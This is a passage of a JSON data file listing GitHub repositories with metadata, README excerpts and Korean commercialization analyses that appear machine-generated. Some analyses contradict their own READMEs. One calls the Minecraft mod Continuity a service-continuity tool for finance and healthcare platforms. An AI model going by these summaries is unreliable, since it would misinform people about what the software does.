실시간 알림 서비스\n- **내부 업무 도구**: 회사 직원들이 사용하는 데이터 ","readme_excerpt":"# NBIO - NON-BLOCKING IO\r\n\r\n\r\n<!-- [![Slack][1]][2] -->\r\n\r\n[![Mentioned in Awesome Go][3]][4] [![MIT licensed][5]][6] [![Go Version][7]][8] [![Build Status][9]][10] [![Go Report Card][11]][12]\r\n\r\n[1]: https://img.shields.io/badge/join-us%20on%20slack-gray.svg?longCache=true&logo=slack&colorB=green\r\n[2]: https://join.slack.com/t/arpcnbio/shared_invite/zt-vh3g1z2v-qqoDp1hQ45fJZqwPrSz4~Q\r\n[3]: https://awesome.re/mentioned-badge-flat.svg\r\n[4]: https://github.com/avelino/awesome-go#networking\r\n[5]: https://img.shields.io/badge/license-MIT-blue.svg\r\n[6]: LICENSE\r\n[7]: https://img.shields.io/badge/go-%3E%3D1.16-30dff3?style=flat-square&logo=go\r\n[8]: https://github.com/lesismal/nbio\r\n[9]: https://img.shields.io/github/actions/workflow/status/lesismal/nbio/autobahn.yml?branch=master&style=flat-square&logo=github-actions\r\n[10]: https://github.com/lesismal/nbio/actions?query=workflow%3autobahn\r\n[11]: https://goreportcard.com/badge/github.com/lesismal/nbio\r\n[12]: https://goreportcard.com/report/gi","composite_score":0.0319,"license_safety_tag":"safe"},{"name":"kubernetes-sigs/descheduler","github_url":"https://github.com/kubernetes-sigs/descheduler","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Kubernetes Descheduler 분석\n\n## 왜 보물인가\n클라우드 서버 자원을 자동으로 정리정돈하여 비용을 절감하고 성능을 최적화하는 필수 운영 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 호스팅 업체가 자사 데이터센터의 서버 자원을 효율적으로 관리하고 고객에게 더 저렴한 요금으로 제공하는 기반 기술\n2. *","readme_excerpt":"[![Go Report Card](https://goreportcard.com/badge/sigs.k8s.io/descheduler)](https://goreportcard.com/report/sigs.k8s.io/descheduler)\n![Release Charts](https://github.com/kubernetes-sigs/descheduler/workflows/Release%20Charts/badge.svg)\n\n<p align=\"left\">\n\t↗️️ Click at the [bullet list icon] at the top right corner of the Readme visualization for the github generated table of contents.\n</p>\n\n<p align=\"center\">\n    <img src=\"assets/logo/descheduler-stacked-color.png\" width=\"40%\" align=\"center\" alt=\"descheduler\">\n</p>\n\n# Descheduler for Kubernetes\n\nScheduling in Kubernetes is the process of binding pending pods to nodes, and is performed by\na component of Kubernetes called kube-scheduler. The scheduler's decisions, whether or where a\npod can or can not be scheduled, are guided by its configurable policy which comprises of set of\nrules, called predicates and priorities. The scheduler's decisions are influenced by its view of\na Kubernetes cluster at that point of time when a new pod appears ","composite_score":0.0318,"license_safety_tag":"safe"},{"name":"emmarktech/claw-code","github_url":"https://github.com/emmarktech/claw-code","stars":151,"language":"Rust","license":"NOASSERTION","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.0318,"license_safety_tag":"unknown"},{"name":"xerial/sqlite-jdbc","github_url":"https://github.com/xerial/sqlite-jdbc","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":1,"description":"# SQLite JDBC 저장소 분석\n\n## 왜 보물인가\nJava 프로그램에서 가벼운 데이터베이스를 쉽게 사용할 수 있게 해주는 핵심 도구로, 수많은 기업 시스템의 기초가 되고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업용 재무 관리 SaaS에서 로컬 데이터 캐싱 기능 제공\n- **내부 업무 도구**: 회사 직원들이 사용하는 ","readme_excerpt":"= SQLite JDBC Driver\n:project-version: 3.53.1.0\n\nimage:https://img.shields.io/github/actions/workflow/status/xerial/sqlite-jdbc/ci.yml?branch=master[GitHub Workflow Status (branch),link=https://github.com/xerial/sqlite-jdbc/actions/workflows/ci.yml?query=branch%3Amaster]\nimage:https://badges.gitter.im/xerial/sqlite-jdbc.svg[Join the chat,link=https://gitter.im/xerial/sqlite-jdbc?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge]\nimage:https://img.shields.io/maven-central/v/org.xerial/sqlite-jdbc?label=maven%20central&color=dark-green[Maven Central,link=https://central.sonatype.com/artifact/org.xerial/sqlite-jdbc]\nimage:https://javadoc.io/badge2/org.xerial/sqlite-jdbc/javadoc.svg[javadoc,link=https://javadoc.io/doc/org.xerial/sqlite-jdbc]\nimage:https://img.shields.io/maven-metadata/v?color=blue&label=maven%20snapshot&metadataUrl=https%3A%2F%2Fcentral.sonatype.com%2Frepository%2Fmaven-snapshots%2Forg%2Fxerial%2Fsqlite-jdbc%2Fmaven-metadata.xml[]\n\nSQLite JDBC is a ","composite_score":0.0317,"license_safety_tag":"safe"},{"name":"rover95/morse-encrypt","github_url":"https://github.com/rover95/morse-encrypt","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":2,"description":"# morse-encrypt 저장소 분석\n\n## 왜 보물인가\n모르스 부호를 이용한 암호화 기술로, 일반인도 이해하기 쉬운 방식으로 메시지를 안전하게 보호할 수 있는 독특한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학생과 역사 애호가를 위한 모르스 부호 학습 및 메시지 암호화 플랫폼\n2. **취미 커뮤니티 도구**: 아마추어 무","readme_excerpt":"# 隐藏字符加密\n\n原理是利用零宽字符对加密文本进行转码，嵌入到普通文本当中，从而隐藏加密内容；表面看起来是一段普通文本，复制粘贴不会丢失  \n\n[原理介绍(知乎)](https://zhuanlan.zhihu.com/p/75992161)  \n\n## **更新**\n- 添加unicode转码, 支持所有字符\n- npm包使用\n```\nnpm i zero-encrypt -S\n```\n\n```js\nvar encrypt = require('zero-encrypt')\n/*\n    基于摩斯电码加密\n    @param {String} str 待加密文本\n    @param {String} textBefore 前段明文\n    @param {String} textAfter 后段明文\n*/\nencrypt.incode(str,textBefore, textAfter)\n\n/*\n    基于摩斯电码解密\n    @param {String} text 待解密字符串\n*/\nencrypt.decode(text)\n\n/*\n    unicode加密\n    @param {String} str 待加密文本\n    @param {String} textBefore 前段明文\n    @param {String} textAfter 后段明文\n*/\nincodeByUnicode (str, textBefore, textAfter)\n\n/*\n  unicode解密\n  @param {String} str 待解密字符串\n*/\ndecodeByUnicode (str)\n```\n\n## 存储隐藏信息  \n\n比如隐藏加密存储比特币钱包，或者在你的代码里埋下一个彩蛋  \n![gif](https://raw.githubusercontent.com/rover95/morse-encrypt/master/src/assets/morse-b.gif)\n\n## 秘密传达消息\n\n零宽字符在大部分应用都支持，pc版QQ会显示零宽字符，但移动端不显示 [issue#7](https://github.com/rover95/morse-encrypt/issues/7)  \n\n你可以将密文加密到普通文本中，然后邮件发送，表面上看起来是普通文","composite_score":0.0316,"license_safety_tag":"unknown"},{"name":"securego/gosec","github_url":"https://github.com/securego/gosec","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# securego/gosec 분석 보고서\n\n## 왜 보물인가\n소프트웨어 개발 시 보안 취약점을 자동으로 찾아주는 도구로, 기업의 보안 사고를 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 코드 검사 플랫폼에서 자동 보안 진단 기능으로 제공하여 개발자의 안전한 개발을 지원\n2. **내부 업무 도구**: 금융·통신사의 ","readme_excerpt":"\n# gosec - Go Security Checker\n\nInspects source code for security problems by scanning the Go AST\nand SSA code representation.\n\n<img src=\"https://securego.io/img/gosec.png\" width=\"320\">\n\n## Quick links\n\n- [GitHub Action](#github-action)\n- [Local installation](#local-installation)\n- [Quick start](#quick-start)\n- [Common usage patterns](#common-usage-patterns)\n- [Selecting rules](#selecting-rules)\n- [Output formats](#output-formats)\n\n## Features\n\n- **Pattern-based rules** for detecting common security issues\n  in Go code\n- **SSA-based analyzers** for type conversions, slice bounds,\n  and crypto issues\n- **Taint analysis** for tracking data flow from user input to\n  dangerous functions (SQL injection, command injection, path\n  traversal, SSRF, XSS, log injection, SMTP injection, SSTI,\n  unsafe deserialization, open redirect)\n\n## License\n\nLicensed under the Apache License, Version 2.0 (the \"License\").\nYou may not use this file except in compliance with the License.\nYou may obtain a copy of","composite_score":0.0314,"license_safety_tag":"safe"},{"name":"Ekito/koin","github_url":"https://github.com/Ekito/koin","stars":7,"language":"Kotlin","license":"apache-2.0","abandonment_months":0,"description":"# Ekito/koin 상용화 분석\n\n## 왜 보물인가\n애플리케이션 개발 시 필요한 부품들을 자동으로 조립해주는 도구로, 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신규 웹 애플리케이션 개발 속도를 2배 이상 높여 출시 시간 단축\n2. **내부 업무 도구**: 대기업의 IT 부서가 표준화된 개발 프레임워","readme_excerpt":"![logo](./docs/img/koin_main_logo.png)\n\n[![Kotlin](https://img.shields.io/badge/Kotlin-2.3.20-blue.svg?style=flat&logo=kotlin)](https://kotlinlang.org)\n![Github Actions](https://github.com/InsertKoinIO/koin/actions/workflows/build.yml/badge.svg)\n[![Apache 2 License](https://img.shields.io/github/license/InsertKoinIO/koin)](https://github.com/InsertKoinIO/koin/blob/main/LICENSE.txt)\n[![Slack channel](https://img.shields.io/badge/Chat-Slack-orange.svg?style=flat&logo=slack)](https://kotlinlang.slack.com/messages/koin/)\n\n\n# What is KOIN? ✨\n \nKoin is a pragmatic, lightweight dependency injection framework for Kotlin developers, developed by [Kotzilla](https://kotzilla.io) and open-source [contributors](https://github.com/InsertKoinIO/koin/graphs/contributors).\n\n```\nThe pragmatic Kotlin & Kotlin Multiplatform Dependency Injection framework\n- Simple, Powerful and now Compile-Safe -\n```\n\n## Compile-Safe Dependency Injection 🛡️\n\nKoin is now **compile-safe** thanks to the [Koin Compiler Plugin]","composite_score":0.0314,"license_safety_tag":"safe"},{"name":"laravel/horizon","github_url":"https://github.com/laravel/horizon","stars":7,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Laravel Horizon 상용화 분석\n\n## 왜 보물인가\n웹사이트의 백그라운드 작업(예: 이메일 발송, 데이터 처리)을 효율적으로 관리하고 모니터링하는 도구로, 온라인 서비스 운영 시 필수적인 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 전자상거래 플랫폼에서 주문 처리, 결제 확인, 배송 알림 자동화\n- 이메일 마케","readme_excerpt":"<p align=\"center\"><img width=\"373\" height=\"60\" src=\"/art/logo.svg\" alt=\"Laravel Horizon\"></p>\n\n<p align=\"center\">\n<a href=\"https://github.com/laravel/horizon/actions\"><img src=\"https://github.com/laravel/horizon/workflows/tests/badge.svg\" alt=\"Build Status\"></a>\n<a href=\"https://packagist.org/packages/laravel/horizon\"><img src=\"https://img.shields.io/packagist/dt/laravel/horizon\" alt=\"Total Downloads\"></a>\n<a href=\"https://packagist.org/packages/laravel/horizon\"><img src=\"https://img.shields.io/packagist/v/laravel/horizon\" alt=\"Latest Stable Version\"></a>\n<a href=\"https://packagist.org/packages/laravel/horizon\"><img src=\"https://img.shields.io/packagist/l/laravel/horizon\" alt=\"License\"></a>\n</p>\n\n## Introduction\n\nHorizon provides a beautiful dashboard and code-driven configuration for your Laravel powered Redis queues. Horizon allows you to easily monitor key metrics of your queue system such as job throughput, runtime, and job failures.\n\nAll of your worker configuration is stored in a","composite_score":0.0313,"license_safety_tag":"safe"},{"name":"InsertKoinIO/koin","github_url":"https://github.com/InsertKoinIO/koin","stars":5,"language":"Kotlin","license":"apache-2.0","abandonment_months":0,"description":"# Koin 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 개발 환경을 더 간단하게 만들어주는 도구로, 개발자들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 개발 환경 관리 플랫폼으로 제공하여 팀 단위 구독료 징수\n- **내부 업무 도구**: 소프트웨어 회사의 개발팀이 자체 프로젝트 관리에 도입하","readme_excerpt":"![logo](./docs/img/koin_main_logo.png)\n\n[![Kotlin](https://img.shields.io/badge/Kotlin-2.3.20-blue.svg?style=flat&logo=kotlin)](https://kotlinlang.org)\n![Github Actions](https://github.com/InsertKoinIO/koin/actions/workflows/build.yml/badge.svg)\n[![Apache 2 License](https://img.shields.io/github/license/InsertKoinIO/koin)](https://github.com/InsertKoinIO/koin/blob/main/LICENSE.txt)\n[![Slack channel](https://img.shields.io/badge/Chat-Slack-orange.svg?style=flat&logo=slack)](https://kotlinlang.slack.com/messages/koin/)\n\n\n# What is KOIN? ✨\n \nKoin is a pragmatic, lightweight dependency injection framework for Kotlin developers, developed by [Kotzilla](https://kotzilla.io) and open-source [contributors](https://github.com/InsertKoinIO/koin/graphs/contributors).\n\n```\nThe pragmatic Kotlin & Kotlin Multiplatform Dependency Injection framework\n- Simple, Powerful and now Compile-Safe -\n```\n\n## Compile-Safe Dependency Injection 🛡️\n\nKoin is now **compile-safe** thanks to the [Koin Compiler Plugin]","composite_score":0.0313,"license_safety_tag":"safe"},{"name":"lightninglabs/lightning-node-connect","github_url":"https://github.com/lightninglabs/lightning-node-connect","stars":6,"language":"Go","license":"MIT","abandonment_months":2,"description":"# Lightning Node Connect 상용화 분석\n\n## 왜 보물인가\n비트코인 번개 네트워크를 원격으로 안전하게 제어할 수 있는 기술로, 암호화폐 관련 비즈니스의 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소**: 사용자의 디지털 자산을 안전하게 관리하는 SaaS 서비스로 제공\n2. **비트코인 결제 플랫폼**:","readme_excerpt":"# Lightning Node Connect (LNC)\n\nSecure, private access to a Lightning node over an untrusted web server.\nLNC leverages [Password Authenticated Key Exchange\n(PAKE)](https://en.wikipedia.org/wiki/Password-authenticated_key_agreement) and\nmacaroon-scoped gRPC connections to enable developers/users a trust-minimized\napplication experience. LNC removes various network obstructions (NAT etc.) to\nprovide disintermediated access to user-run Lightning Network infrastructure and\napp UX.\n\nLightning Node Connect improves on prior trust/access efforts at solving this\nproblem (like [LND Connect](https://github.com/LN-Zap/lndconnect)) by using a\nPAKE instead of manually managing TLS certificates and macaroons. Lightning Node\nConnect's PAKE is combined with the [Noise Protocol\nFramework](http://noiseprotocol.org/noise.html) to create a pairing flow where a\nuser only needs to enter a short human-readable passphrase (scan or click a\nlink) to establish a secure end-to-end encrypted/mutually-authenticated","composite_score":0.0311,"license_safety_tag":"safe"},{"name":"vorner/arc-swap","github_url":"https://github.com/vorner/arc-swap","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":2,"description":"# arc-swap 저장소 분석\n\n## 왜 보물인가\n여러 프로그램이 동시에 같은 자료에 접근할 때 안전하게 데이터를 교환하는 기술로, 고성능 시스템에서 매우 중요한 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 데이터 처리 SaaS**: 주식 시세, 센서 데이터 같은 정보를 여러 사용자에게 동시에 안전하게 전달하는 서비스\n2. **클라우드 내","readme_excerpt":"# ArcSwap\n\n[![Actions Status](https://github.com/vorner/arc-swap/workflows/test/badge.svg)](https://github.com/vorner/arc-swap/actions)\n[![Codecov](https://codecov.io/gh/vorner/arc-swap/branch/master/graph/badge.svg?token=3KA3R2D9fV)](https://codecov.io/gh/vorner/arc-swap)\n[![Docs](https://docs.rs/arc-swap/badge.svg)](https://docs.rs/arc-swap)\n\nThis provides something similar to what `RwLock<Arc<T>>` is or what\n`Atomic<Arc<T>>` would be if it existed, optimized for read-mostly write-seldom\nscenarios, with consistent performance characteristics.\n\nRead [the documentation](https://docs.rs/arc-swap) before using.\n\n## Rust version policy\n\nThe 1. version will build on any edition 2018 capable compiler. This does not\ninclude:\n\n* Tests. Tests build and run on recent compilers, mostly because of\n  dependencies.\n* Additional feature flags. Most feature flags are guaranteed to build since the\n  version they are introduced. Experimental features are without any guarantees.\n\n## License\n\nLicensed un","composite_score":0.0309,"license_safety_tag":"safe"},{"name":"ghosh/Micromodal","github_url":"https://github.com/ghosh/Micromodal","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# Micromodal 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 사용자에게 중요한 정보나 선택지를 팝업 창으로 깔끔하게 표시하는 기술로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 서비스 회사가 결제 확인창, 약관 동의창 등을 사용자 친화적으로 표시하는 데 활용\n2. **내부 업무 도구**:","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://www.dropbox.com/s/tbaooyi4yh8pbi7/logo.png?raw=1\" width=\"100px\"/>\n</p>\n<h3 align=\"center\">\n  Micromodal.js\n</h3>\n\n<p align=\"center\">\n  <a href=\"#\">\n    <img src=\"https://img.shields.io/badge/made%20with-love-E760A4.svg\" alt=\"Made with love\">\n  </a>\n  <a href=\"https://opensource.org/licenses/MIT\" target=\"_blank\" rel=\"noopener\">\n    <img src=\"https://img.shields.io/badge/license-MIT-blue.svg\" alt=\"License\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/micromodal\" target=\"_blank\" rel=\"noopener\">\n    <img src=\"https://img.shields.io/npm/v/micromodal.svg\" alt=\"Package version\">\n  </a>\n</p>\n\n<p align=\"center\">\n  Tiny, dependency-free javascript library for creating accessible modal dialogs\n</p>\n\n---\n\n<img src=\"https://www.dropbox.com/s/8g7fr091tk8o62j/micromodal.gif?raw=1\" width=\"100%\">\n\nThe aim of this library is to make modal dialogs accessible and easy to include in your project with minimum configuration. It's only ~1.8kb minified and gzipped - A","composite_score":0.0309,"license_safety_tag":"safe"},{"name":"tata1661/FSL-Mate","github_url":"https://github.com/tata1661/FSL-Mate","stars":7,"language":"Python","license":"unknown","abandonment_months":1,"description":"# FSL-Mate 프로젝트 분석\n\n## 왜 보물인가\n기계학습 모델을 적은 데이터로도 효과적으로 학습시킬 수 있는 기술로, 비용과 시간을 대폭 줄이면서도 정확도를 유지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **의료 AI 서비스**: 희귀질환 진단 모델을 소수의 사례로도 빠르게 구축하는 의료기관 대상 SaaS\n- **소매업체 수요예측**: 신규 지점","readme_excerpt":"<p align=\"center\"><img src=\"logo-fsl-mate.png\" alt=\"logo\" width=\"400px\" /></p>\n\n\n---\n\n**FSL-Mate** is a collection of resources for few-shot learning (FSL).  \n\nIn particular, FSL-Mate currently contains\n\n- [**FewShotPapers**](https://github.com/tata1661/FSL-Mate/tree/master/FewShotPapers): a paper list which tracks the research advances on FSL\n- [**PaddleFSL**](https://github.com/tata1661/FSL-Mate/tree/master/PaddleFSL): a PaddlePaddle-based python library for FSL \n\nWe are endeavored to constantly update FSL-Mate. Hopefully, it can make FSL easier. \n\n## News🔥 \n\n- [2026-04-18] Add FSL papers published in EMNLP 2025 and ICCV 2025, ICML 2025, WWW 2026 and AAAI 2026.\n\n- [2025-10-14] Add FSL papers published in CVPR 2025, ACL 2025 and IJCAI 2025.\n\n- [2025-07-17] Add FSL papers published in CVPR 2024, ICML 2024, IJCAI 2024, ACL 2024, NeurIPS 2024, EMNLP 2024, ICCV 2024, ICLR 2025, WWW 2024-2025, KDD 2024-2025, AAAI 2024-2025, NAACL 2024-2025, SIGIR 2024-2025.\n\n\n## Cite Us\n\nPlease cite our [p","composite_score":0.0309,"license_safety_tag":"unknown"},{"name":"ThomasFKJorna/emacs-docs","github_url":"https://github.com/ThomasFKJorna/emacs-docs","stars":36,"language":"JavaScript","license":"NOASSERTION","abandonment_months":2,"description":"# Emacs-Docs 저장소 분석\n\n## 왜 보물인가\n텍스트 편집기 Emacs의 사용법과 팁을 정리한 문서 모음으로, 프로그래머들이 자주 찾는 학습 자료를 체계적으로 관리하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Emacs 학습 플랫폼 구독 서비스 (동영상 튜토리얼, 실시간 Q&A 포함)\n2. **내부 업무 도구**: 개발팀","readme_excerpt":"# Emacs Docs\n\n![Last updated: 2026-04-03](https://img.shields.io/badge/last_updated-2026--04--03-blue)\n\n> The modern documentation website Emacs deserves.\n\n![Emacs Docs Mascot](https://emacsdocs.org/img/Banner.png)\n\n## Why\n\nI didn't particularly enjoy either browsing the manual online or in Emacs, and wished there was a modern equivalent. Luckily, there is now!\n\n## Included manuals\n\n- Emacs Manual [source](https://www.gnu.org/software/emacs/manual/emacs.html)\n- Emacs Lisp Manual [source](https://www.gnu.org/software/emacs/manual/elisp.html)\n- Org Mode Manual [source](https://www.gnu.org/software/emacs/manual/org.html)\n- AUCTeX Manual [source](https://www.gnu.org/software/auctex/manual/auctex.index.html)\n- Magit Manual [source](https://magit.vc/manual/magit/)\n\n### How to include other manuals\n\nOnly documentation for Emacs core and Emacs packages will be included, which must satisfy the following requirements:\n\n1. Be licensed under a free documentation license such as the GNU Free Docume","composite_score":0.0308,"license_safety_tag":"unknown"},{"name":"neuecc/MessagePack-CSharp","github_url":"https://github.com/neuecc/MessagePack-CSharp","stars":5,"language":"C#","license":"NOASSERTION","abandonment_months":0,"description":"# MessagePack-CSharp 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 매우 작은 용량으로 빠르게 압축 및 전송하는 기술로, 게임, 금융 시스템, 실시간 통신 애플리케이션의 성능을 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 멀티플레이어 게임 SaaS**\n플레이어의 움직임, 아이템 정보 등을 초당 수십 번 전송할 때 ","readme_excerpt":"# MessagePack for C# (.NET Framework, .NET 8, Unity, Xamarin)\n\n[![NuGet](https://img.shields.io/nuget/v/MessagePack.svg)](https://www.nuget.org/packages/messagepack)\n[![NuGet](https://img.shields.io/nuget/vpre/MessagePack.svg)](https://www.nuget.org/packages/messagepack)\n[![Releases](https://img.shields.io/github/release/neuecc/MessagePack-CSharp.svg)](https://github.com/MessagePack-CSharp/MessagePack-CSharp/releases)\n\n[![Join the chat at https://gitter.im/MessagePack-CSharp/Lobby](https://badges.gitter.im/MessagePack-CSharp/Lobby.svg)](https://gitter.im/MessagePack-CSharp/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://dev.azure.com/ils0086/MessagePack-CSharp/_apis/build/status/MessagePack-CSharp-CI?branchName=master)](https://dev.azure.com/ils0086/MessagePack-CSharp/_build/latest?definitionId=2&branchName=master)\n\nThe extremely fast [MessagePack](http://msgpack.org/) serializer for C#.\nIt is 10x faster than [MsgPack-Cli](https","composite_score":0.0308,"license_safety_tag":"unknown"},{"name":"pyroscope-io/pyroscope","github_url":"https://github.com/pyroscope-io/pyroscope","stars":6,"language":"Go","license":"AGPL-3.0","abandonment_months":0,"description":"# Pyroscope 저장소 분석\n\n## 왜 보물인가\n프로그램이 느려지는 원인을 자동으로 찾아주는 '성능 진단 도구'로, 소프트웨어 회사들이 서비스 속도 문제를 빠르게 해결하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 성능 모니터링 플랫폼**\n- 클라우드 소프트웨어 회사들이 고객에게 자신들의 서비스 성능을 실시간으로 보여주는","readme_excerpt":"<p align=\"center\"><img alt=\"Pyroscope\" src=\"https://github.com/grafana/pyroscope/assets/662636/c1fc4055-b33d-4e69-a450-9e7a7b2317bb\" width=\"100%\"/></p>\n\n\n[![ci](https://github.com/grafana/pyroscope/actions/workflows/test.yml/badge.svg)](https://github.com/grafana/pyroscope/actions/workflows/test.yml)\n[![JS Tests Status](https://github.com/grafana/pyroscope/workflows/JS%20Tests/badge.svg)](https://github.com/grafana/pyroscope/actions?query=workflow%3AJS%20Tests)\n[![Go Report](https://goreportcard.com/badge/github.com/grafana/pyroscope)](https://goreportcard.com/report/github.com/grafana/pyroscope)\n[![License: AGPLv3](https://img.shields.io/badge/License-AGPL%20v3-blue.svg)](LICENSE)\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fgrafana%2Fpyroscope.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2Fgrafana%2Fpyroscope?ref=badge_shield)\n[![Latest release](https://img.shields.io/github/release/grafana/pyroscope.svg)](https://github.com/grafana/pyro","composite_score":0.0306,"license_safety_tag":"risky"},{"name":"yacy/yacy_search_server","github_url":"https://github.com/yacy/yacy_search_server","stars":12,"language":"Java","license":"NOASSERTION","abandonment_months":1,"description":"# YaCy 검색 엔진 서버 - 보물지도\n\n## 왜 보물인가\nGoogle이나 Naver 같은 거대 기업에 의존하지 않고 독립적으로 웹을 검색할 수 있는 개인/단체용 검색 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 내부 문서 검색 SaaS**\n- 회사 직원들이 사내 자료를 빠르게 찾을 수 있는 구독형 검색 서비스로 제공\n\n**2. 개인정보 보호","readme_excerpt":"<div align=\"center\">\n<h1 align=\"center\">YaCy</h1>\n\nSearch Engine Software\n\n\n[![YaCy Home Page](https://img.shields.io/badge/YaCy%20Home%20Page-5090D0)](https://yacy.net)\n[![YaCy Discourse Forums](https://img.shields.io/discourse/status?server=https%3A%2F%2Fcommunity.searchlab.eu%2F&label=YaCy%20Discourse%20Forums)](https://community.searchlab.eu/)\n[![become a Github Sponsor](https://img.shields.io/badge/Become_a_Github_Sponsor-for_YaCy-green)](https://github.com/sponsors/Orbiter)\n[![become a Patreon Member](https://img.shields.io/badge/Become_a_Patreon_Member-for_YaCy-green)](https://www.patreon.com/bePatron?u=185903)\n[![Build Status](https://github.com/yacy/yacy_search_server/actions/workflows/ant-build-selfhosted.yaml/badge.svg)](https://github.com/yacy/yacy_search_server/actions/workflows/ant-build-selfhosted.yaml)\n[![Install Link](https://img.shields.io/badge/install-stable-blue.svg)](https://yacy.net/download_installation/)\n\n![Web Search](./screenshots/screenshot_web_search.png)\n!","composite_score":0.0304,"license_safety_tag":"unknown"},{"name":"ekremkaraca/awesome-rails","github_url":"https://github.com/ekremkaraca/awesome-rails","stars":6,"language":"","license":"mit","abandonment_months":1,"description":"# awesome-rails 분석 보고서\n\n## 왜 보물인가\n웹 서비스를 만들 때 필요한 수천 개의 유용한 도구와 라이브러리 목록을 한곳에 모아놓은 개발자용 지도책입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 회사의 온보딩 도구**: 신입 개발자들이 Rails 프로젝트를 시작할 때 필요한 모든 도구를 한 페이지에서 찾을 수 있는 SaaS 플랫폼으로","readme_excerpt":"# Awesome Rails\n\n> A curated list of awesome things related to Ruby on Rails [![Awesome](https://awesome.re/badge.svg)](https://github.com/sindresorhus/awesome#readme)\n\n![awesome-rails](./.github/assets/awesome-rails.png)\n\n## Table of Contents\n\n- [Resources](#resources)\n  - [Official Resources](#official-resources)\n  - [External Resources](#external-resources)\n    - [Books](#books)\n    - [Video tutorials](#video-tutorials)\n    - [Youtube channels](#youtube-channels)\n    - [Other external resources](#other-external-resources)\n  - [Jobs](#jobs)\n  - [Community](#community)\n  - [Articles](#articles)\n- [Open Source Rails Apps](#open-source-rails-apps)\n- [Gems](#gems)\n- [Starters/Boilerplates](#startersboilerplates)\n- [Other Rails Tools](#other-rails-tools)\n  - [Platforms](#platforms)\n  - [Generators](#generators)\n  - [DevTools](#devtools)\n\n## Resources\n\n### Official Resources\n\n- [Rails Official Website](https://rubyonrails.org)\n- [Rails Official Guide](https://guides.rubyonrails.org)\n- [Rai","composite_score":0.0304,"license_safety_tag":"safe"},{"name":"PepperCode1/Continuity","github_url":"https://github.com/PepperCode1/Continuity","stars":5,"language":"Java","license":"LGPL-3.0","abandonment_months":2,"description":"# PepperCode1/Continuity 평가 분석\n\n## 왜 보물인가\n업무 중단 없이 서비스를 계속 운영할 수 있도록 도와주는 기술로, 서비스 장애로 인한 손실을 줄이려는 모든 기업이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 금융·의료 플랫폼에서 장애 발생 시에도 서비스를 중단 없이 제공하여 고객 신뢰도 향상\n- **내부","readme_excerpt":"# Continuity\n\nContinuity is a Minecraft mod that allows resource packs that use the OptiFine connected textures format, OptiFine emissive textures format (only for blocks and item models), or OptiFine custom block layers format to work without OptiFine.\n\nContinuity is client-side only and includes two built-in resource packs. The Default Connected Textures pack provides connected textures for glass, sandstone, and bookshelves, similar to the built-in connected textures provided by OptiFine. The Glass Pane Culling Fix pack culls faces between vertically stacked glass panes to make them look seamless with connected textures.\n\nFormally, Continuity implements the Continuity connected textures specification, Continuity emissive textures specification, and Continuity custom block layers specification. All of these are extensions of the corresponding OptiFine specification and were created to provide more features to resource pack authors. The documentation for the Continuity specifications c","composite_score":0.0303,"license_safety_tag":"restricted"},{"name":"Enter-tainer/cxx2flow","github_url":"https://github.com/Enter-tainer/cxx2flow","stars":7,"language":"Rust","license":"MIT","abandonment_months":2,"description":"# Enter-tainer/cxx2flow 분석\n\n## 왜 보물인가\nC++ 코드를 시각적 흐름도로 자동 변환해주는 도구로, 복잡한 프로그래밍 코드를 누구나 이해할 수 있는 그림으로 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자용 웹 기반 코드 분석 플랫폼으로 구독 모델 운영\n- **내부 업무 도구**: 대형 IT 회사의 코드 ","readme_excerpt":"# cxx2flow\r\n\r\n[简体中文](README.md) | [English](README-en.md)\r\n\r\n将 C/C++ 代码转换为流程图\r\n\r\n## 效果\r\n\r\n更多效果图请参考 [GALLERY](gallery.md)\r\n\r\n两种样式：\r\n| | |\r\n|:-:|:-:|\r\n| 折线 | 平滑 |\r\n|![ployline](assets/polyline.svg)|![curve](assets/curve.svg)|\r\n\r\n```cpp\r\ninline int read() {  //快读\r\n  char c = getchar();\r\n  int x = 0, f = 1;\r\n  while (c < '0' || c > '9') {\r\n    if (c == '-') f = -1;\r\n    c = getchar();\r\n  }\r\n  while (c >= '0' && c <= '9') {\r\n    x = x * 10 + 